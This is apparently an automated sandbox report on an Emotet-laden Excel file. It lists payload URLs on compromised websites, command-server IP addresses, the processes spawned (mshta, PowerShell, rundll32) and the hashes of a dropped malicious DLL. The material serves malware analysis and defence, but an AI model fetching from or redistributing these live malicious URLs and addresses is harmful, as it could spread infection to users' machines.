                            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/100%Avira URL Cloudmalware
                            http://it-o.biz/bitrix/xoDdDe/100%Avira URL Cloudmalware
                            https://gudangtasorichina.com/wp-content/GG01c/100%Avira URL Cloudmalware
                            http://totalplaytuxtla.com/sitio/DgktL3zd/100%Avira URL Cloudmalware
                            http://activetraining.sytes.net/libraries/8s/100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.p0%Avira URL Cloudsafe
                            http://gardeningfilm.com/wp-cont100%Avira URL Cloudmalware
                            http://jurnalpjf.lan.go.id/assets/iM/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.htmlB0%Avira URL Cloudsafe
                            http://ja.com/0%Avira URL Cloudsafe
                            http://91.240.118.172/gg/ff/fe.htmlC0%Avira URL Cloudsafe
                            http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3100%Avira URL Cloudmalware
                            http://bimesarayenovin.ir/wp-admin/G1pYGL/100%Avira URL Cloudmalware
                            https://160.16.102.168/30%Avira URL Cloudsafe
                            http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3100%Avira URL Cloudmalware
                            http://91.240.118.172/gg/ff/fe.html100%Avira URL Cloudmalware

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            hostfeeling.com
                            		164.90.147.135
                            		truetrueunknown
                            jurnalpjf.lan.go.id
                            		103.206.244.105
                            		truefalseunknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://91.240.118.172/gg/ff/fe.pngtrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://jurnalpjf.lan.go.id/assets/iM/true
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmltrue
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://maxtdeveloper.com/okw9yx/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://it-o.biz/bitrix/xoDdDe/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.inablr.com/elenctic/fpowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://totalplaytuxtla.com/sitio/DgktL3zd/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.html:mshta.exe, 00000004.00000003.419116889.0000000000380000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://ocsp.entrust.net03rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://hostfeeling.com/wp-admin/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.diginotar.nl/cps/pkioverheid0rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://property-eg.com/mlzkir/97v/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.11powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            		low
                            http://91.240.118.172/gg/ff/fe.pngPE3powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://jurnalpjf.lan.go.id/assetpowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://bimesarayenovin.ir/wp-admpowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://160.16.102.168:80/SoFzpWBFIEFVoCFQggrundll32.exe, 0000000F.00000002.673084051.000000000057A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://91.240.118.172/gg/ff/fe.htmlhttp://91.240.118.172/gg/ff/fe.htmlmshta.exe, 00000004.00000003.420332765.0000000002AC5000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://91.240.118.172/gg/ff/fe.html~mshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://ocsp.entrust.net0Drundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://hostfeeling.compowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://daisy.sukoburu-secure.compowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://it-o.biz/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://activetraining.sytes.net/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://gudangtasorichina.com/wp-content/GG01c/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://crl.entrust.net/server1.crl0rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://gudangtasorichina.com/wppowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://daisy.sukpowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlngsmshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlmshtamshta.exe, 00000004.00000002.434771274.0000000000300000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlWinSta0mshta.exe, 00000004.00000002.434771274.0000000000300000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://property-eg.com/mlzkir/97v/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://daisy.sukoburu-secure.com/8plks/v8lyZTe/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://property-eg.com/mlzkir/9powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172powershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://160.16.102.168/rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://jurnalpjf.lan.go.idpowershell.exe, 00000006.00000002.677598508.00000000038AA000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.protware.commshta.exe, 00000004.00000003.419178772.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.434882434.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.435386261.0000000003CAB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.433698819.00000000003DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.435368888.0000000003C92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.433744661.0000000003C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.419492395.0000000003CAB000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://activetraining.sytes.net/libraries/8s/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlfunctionmshta.exe, 00000004.00000003.420573882.0000000002ACD000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://totalplaytuxtla.com/sitiopowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.pkioverheid.nl/DomOvLatestCRL.crl0rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://maxtdeveloper.com/okw9yx/Gc28ZX/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://it-o.biz/bitrix/xoDdDe/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://gudangtasorichina.com/wp-content/GG01c/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://totalplaytuxtla.com/sitio/DgktL3zd/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://activetraining.sytes.net/libraries/8s/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172/gg/ff/fe.ppowershell.exe, 00000006.00000002.677440372.0000000003711000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://gardeningfilm.com/wp-contpowershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://jurnalpjf.lan.go.id/assets/iM/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlBimedpub_6.xls.0.drtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://ja.com/powershell.exe, 00000006.00000002.672127760.00000000001D0000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://91.240.118.172/gg/ff/fe.htmlCmshta.exe, 00000004.00000002.434786060.000000000033E000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://bimesarayenovin.ir/wp-admin/G1pYGL/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://bimesarayenovin.ir/wp-admin/G1pYGL/powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://secure.comodo.com/CPS0rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://160.16.102.168/3rundll32.exe, 0000000F.00000002.673152455.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://crl.entrust.net/2048ca.crl0rundll32.exe, 0000000F.00000002.673192959.00000000005E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://daisy.sukoburu-secure.com/8plks/v8lyZTe/PE3powershell.exe, 00000006.00000002.677568630.0000000003865000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: malware
                                  		unknown

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  195.154.133.20
                                  		unknownFrance
                                  		12876OnlineSASFRtrue
                                  185.157.82.211
                                  		unknownPoland
                                  		42927S-NET-ASPLtrue
                                  212.237.17.99
                                  		unknownItaly
                                  		31034ARUBA-ASNITtrue
                                  79.172.212.216
                                  		unknownHungary
                                  		61998SZERVERPLEXHUtrue
                                  110.232.117.186
                                  		unknownAustralia
                                  		56038RACKCORP-APRackCorpAUtrue
                                  173.214.173.220
                                  		unknownUnited States
                                  		19318IS-AS-1UStrue
                                  212.24.98.99
                                  		unknownLithuania
                                  		62282RACKRAYUABRakrejusLTtrue
                                  138.185.72.26
                                  		unknownBrazil
                                  		264343EmpasoftLtdaMeBRtrue
                                  178.63.25.185
                                  		unknownGermany
                                  		24940HETZNER-ASDEtrue
                                  160.16.102.168
                                  		unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                  81.0.236.90
                                  		unknownCzech Republic
                                  		15685CASABLANCA-ASInternetCollocationProviderCZtrue
                                  103.75.201.2
                                  		unknownThailand
                                  		133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                  216.158.226.206
                                  		unknownUnited States
                                  		19318IS-AS-1UStrue
                                  45.118.115.99
                                  		unknownIndonesia
                                  		131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                                  51.15.4.22
                                  		unknownFrance
                                  		12876OnlineSASFRtrue
                                  159.89.230.105
                                  		unknownUnited States
                                  		14061DIGITALOCEAN-ASNUStrue
                                  162.214.50.39
                                  		unknownUnited States
                                  		46606UNIFIEDLAYER-AS-1UStrue
                                  103.206.244.105
                                  		jurnalpjf.lan.go.idIndonesia
                                  		131111CEPATNET-AS-IDPTMoraTelematikaIndonesiaIDfalse
                                  200.17.134.35
                                  		unknownBrazil
                                  		1916AssociacaoRedeNacionaldeEnsinoePesquisaBRtrue
                                  217.182.143.207
                                  		unknownFrance
                                  		16276OVHFRtrue
                                  107.182.225.142
                                  		unknownUnited States
                                  		32780HOSTINGSERVICES-INCUStrue
                                  51.38.71.0
                                  		unknownFrance
                                  		16276OVHFRtrue
                                  45.118.135.203
                                  		unknownJapan63949LINODE-APLinodeLLCUStrue
                                  50.116.54.215
                                  		unknownUnited States
                                  		63949LINODE-APLinodeLLCUStrue
                                  131.100.24.231
                                  		unknownBrazil
                                  		61635GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBRtrue
                                  46.55.222.11
                                  		unknownBulgaria
                                  		34841BALCHIKNETBGtrue
                                  41.76.108.46
                                  		unknownSouth Africa
                                  		327979DIAMATRIXZAtrue
                                  173.212.193.249
                                  		unknownGermany
                                  		51167CONTABODEtrue
                                  45.176.232.124
                                  		unknownColombia
                                  		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                                  178.79.147.66
                                  		unknownUnited Kingdom
                                  		63949LINODE-APLinodeLLCUStrue
                                  212.237.5.209
                                  		unknownItaly
                                  		31034ARUBA-ASNITtrue
                                  162.243.175.63
                                  		unknownUnited States
                                  		14061DIGITALOCEAN-ASNUStrue
                                  176.104.106.96
                                  		unknownSerbia
                                  		198371NINETRStrue
                                  207.38.84.195
                                  		unknownUnited States
                                  		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                  164.68.99.3
                                  		unknownGermany
                                  		51167CONTABODEtrue
                                  164.90.147.135
                                  		hostfeeling.comUnited States
                                  		14061DIGITALOCEAN-ASNUStrue
                                  192.254.71.210
                                  		unknownUnited States
                                  		64235BIGBRAINUStrue
                                  212.237.56.116
                                  		unknownItaly
                                  		31034ARUBA-ASNITtrue
                                  104.168.155.129
                                  		unknownUnited States
                                  		54290HOSTWINDSUStrue
                                  45.142.114.231
                                  		unknownGermany
                                  		44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                                  203.114.109.124
                                  		unknownThailand
                                  		131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                                  209.59.138.75
                                  		unknownUnited States
                                  		32244LIQUIDWEBUStrue
                                  159.8.59.82
                                  		unknownUnited States
                                  		36351SOFTLAYERUStrue
                                  129.232.188.93
                                  		unknownSouth Africa
                                  		37153xneeloZAtrue
                                  91.240.118.172
                                  		unknownunknown
                                  		49453GLOBALLAYERNLtrue
                                  58.227.42.236
                                  		unknownKorea Republic of
                                  		9318SKB-ASSKBroadbandCoLtdKRtrue
                                  158.69.222.101
                                  		unknownCanada
                                  		16276OVHFRtrue
                                  104.251.214.46
                                  		unknownUnited States
                                  		54540INCERO-HVVCUStrue

                                  General Information

                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:562403
                                  Start date:28.01.2022
                                  Start time:21:00:39
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 12m 0s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:imedpub_6.xls
                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                  Number of analysed new started processes analysed:17
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.expl.evad.winXLS@21/12@2/48
                                  EGA Information:
                                  • Successful, ratio: 71.4%
                                  HDC Information:
                                  • Successful, ratio: 18.7% (good quality ratio 15.8%)
                                  • Quality average: 65.4%
                                  • Quality standard deviation: 33%
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .xls
                                  • Changed system and user locale, location and keyboard layout to English - United States
                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                  • Attach to Office via COM
                                  • Scroll down
                                  • Close Viewer

                                  Warnings

                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                  • TCP Packets have been reduced to 100
                                  • Excluded IPs from analysis (whitelisted): 92.123.101.210, 92.123.101.211, 92.123.101.225, 92.123.101.179
                                  • Excluded domains from analysis (whitelisted): wu-shim.trafficmanager.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net
                                  • Execution Graph export aborted for target mshta.exe, PID 1996 because there are no executed function
                                  • Execution Graph export aborted for target powershell.exe, PID 2576 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  21:01:21API Interceptor57x Sleep call for process: mshta.exe modified
                                  21:01:25API Interceptor443x Sleep call for process: powershell.exe modified
                                  21:02:02API Interceptor149x Sleep call for process: rundll32.exe modified

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASNs

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\ProgramData\JooSee.dll

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):548864
                                  Entropy (8bit):6.980518796737633
                                  Encrypted:false
                                  SSDEEP:12288:B2AavzUBPSczbeeTLjvNyMwWd3DYr6i64/:OUBPSczbeeTnvhZDWA
                                  MD5:8A6FB79B56B4C5F45322AAA8150C5E36
                                  SHA1:09453D0478D6725C5ECFBD1644CCC156811F0A6C
                                  SHA-256:DCC5DFE8C7150DD55E2F22EEBAE19F04EFAFA214DC7E1366A0CF4CCC7E616119
                                  SHA-512:2F06489632ADEA7B67D544B3B0491B78AEE29F3C91B38251445ABA70CAF148EF6A1ADCC4158C1B85DC9F2036F790A2AF9622DDF7F3FF85D67A19B87BC5BA7F4F
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\JooSee.dll, Author: Joe Security
                                  Antivirus:
                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                  Download File
                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                  File Type:Microsoft Cabinet archive data, 61414 bytes, 1 file
                                  Category:dropped
                                  Size (bytes):61414
                                  Entropy (8bit):7.995245868798237
                                  Encrypted:true
                                  SSDEEP:1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
                                  MD5:ACAEDA60C79C6BCAC925EEB3653F45E0
                                  SHA1:2AAAE490BCDACCC6172240FF1697753B37AC5578
                                  SHA-256:6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
                                  SHA-512:FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
                                  Malicious:false
                                  Preview:MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..*i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF.*...f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..*y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.*a..x..O..V.t..Y1!.T..`U...-...< _@...|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                  Download File
                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):328
                                  Entropy (8bit):3.104167099933915
                                  Encrypted:false
                                  SSDEEP:6:kKbKk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:u9kPlE99SNxAhUeYlUSA/t
                                  MD5:95F4F0C11185412D12B65919895BDB4E
                                  SHA1:10F9F4BBF444E04A5B5D106B9FD93AB5E7D811C3
                                  SHA-256:343826616ADD89B2917DFB50478FB429999FD64CBE8052DDEC6ACE8A2F9A5B5C
                                  SHA-512:D02D1F22B3C499EF2ACC3719F7E0B40DD09D47EB0F9F61FBCCF8AF4A1D38AB17942DED75B181A14206D914FC12D1E483CE86C5E520DE772F18D1E3B084798BE8
                                  Malicious:false
                                  Preview:p...... ........;s.:....(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

                                  Download File
                                  Process:C:\Windows\System32\mshta.exe
                                  File Type:data
                                  Category:downloaded
                                  Size (bytes):11054
                                  Entropy (8bit):6.200485074224619
                                  Encrypted:false
                                  SSDEEP:192:aY5CkQ90FfYdjqQa2XdytMHsygv2nscEYD63lWAG7orUzAaENQaCBlm1Zhvkz29c:aY4kBBOjqQrXdHHsyg8sCr0UznQQasYS
                                  MD5:DD20B97330028BCB6BF98D97C47028D9
                                  SHA1:D58D97589A97FBD3B1216ED76C4918113F4B7B25
                                  SHA-256:4E945D89F45065FBA3B3318DD8CB3EFF9991CB6F8038168D221B862810E84D21
                                  SHA-512:AF4979B61257330E763B0C450575859D678F6950EF42783C87B2D9ED84130E4651CF58FBEF40E4C0BD3217B957A807337475F85C2610C24317C05DE98AC31A88
                                  Malicious:false
                                  IE Cache URL:http://91.240.118.172/gg/ff/fe.html
